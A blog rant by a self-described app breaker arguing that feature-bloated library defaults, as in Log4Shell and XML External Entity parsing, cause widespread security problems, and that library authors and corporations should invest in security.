Rantuary 15, 2023

Hello everybody. My nick is Fennix, I'm an app breaker by day and night. I might make this a daily thing I might make this every few days I am not sure yet.

For today's rant I want to talk about libraries, their developers, and when not applying the Unix philosophy goes terribly wrong.

I'm going to talk about Log4J but I'm also going to talk about things like XXE and in general design choices that lead to headaches.

When you're designing a library that is intended to be used to tackle some important but common function, it's incredibly important that you keep the library as task focused as possible especially the core library and its defaults. If you need to extend functionality, use a pluggable architecture and make those plugins opt-in. The amount of headache that Log4J (the “log4shell” vulnerability really) caused the world is outsized to what everyone expected the library to do.

It's important to understand that users' expectations of what the library is doing are important. Log4J is not alone in this though. The log4shell vulnerability is very reminiscent to me of XXE. It's a feature that was enabled as a default to do some additional parsing that most of its users didn't want or need and that they didn't necessarily have visibility to.

Along those lines, if you're not familiar with XXE, AKA XML External Entity parsing attacks, the basics of the attack are this: – Attacker submits XML to server – Server parses XML – Server does a bunch of stupid shit like opening remote connections and sending files – Attacker laughs, possibly even a good cackle

When XML as a document standard was being ratified importance was placed on this idea of being able to validate the document against an arbitrary schema in order to make it flexible. It was important that schema specifications not just be able to be loaded from local files but could be loaded from central locations using a variety of different protocols. Examples of these are Gopher, FTP, or later HTTP. XML is very old.

Secondly, in XML there is this concept of entities — a shorthand within the document so that you can refer to some special character or a predefined standard blurb. You have likely seen these; the © that you would use to insert a copyright symbol in an older HTML doc is an entity (HTML having its roots in XML). When you combine these two things what it meant is that you could have remotely loadable entities that would get parsed and loaded on the machine that was processing the document.

Now because you might have some rather large entity, perhaps some boilerplate legalese that needs to be attached to each document, you might want to load that out of a local text file. You might make &legalese; into an entity that reads its data from /usr/lib/standard_disclaimer.txt.

This idea of document processor went from simple to unfocused, and because of these features you can probably see how with XXE you could often steal contents of files, reveal remote server locations, SSRF, cause a denial of service, etc., purely because this specification became overly complicated.

It was then made worse by the fact that as the web was evolving, nobody had a better answer than XML for a long time to do online document exchange. Since it was already a standard in business, it meant that it had the inertia and so there was no reason to change this. Ultimately you end up with major websites being vulnerable to all manner of XXE attacks purely because some support for some long forgotten feature was thrown in there. Even today this happens.

Enter the developer using it: It's not clear that this needs to be turned off, I just wanted to parse an XML document! They don't make any mention of this sort of thing anywhere in the documentation, so why would I think it's by nature unsafe?!

This is horse shit. We should expect better from our library authors. We should expect better from commonly used components. Importantly all the billion dollar corporations that make much of their billions leveraging this kind of software need to pony up, fund some pentests for these things, fund developer education, dedicate some resources to it.